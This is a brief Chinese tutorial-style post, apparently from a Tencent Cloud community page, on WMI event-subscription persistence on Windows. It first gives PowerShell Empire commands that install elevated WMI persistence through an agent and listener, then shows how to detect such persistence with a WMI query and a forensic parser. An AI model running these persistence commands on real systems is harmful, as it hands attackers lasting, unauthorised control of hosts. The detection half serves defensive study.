usemodule powershell/persistence/elevated/wmi
set Agent 91AT5M4V
set Listener test
execute
检查目标主机的情况
powershell:Get-WmiObject -Namespace root\subscription -class commandlineeventconsumer
https://github.com/davidpany/WMI_Forensics.git
WMI 存储库:%windir%\System32\Wbem\Repository---->OBJECTS.DATA
python2 PyWMIPersistenceFinder.py OBJECTS.DATA
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。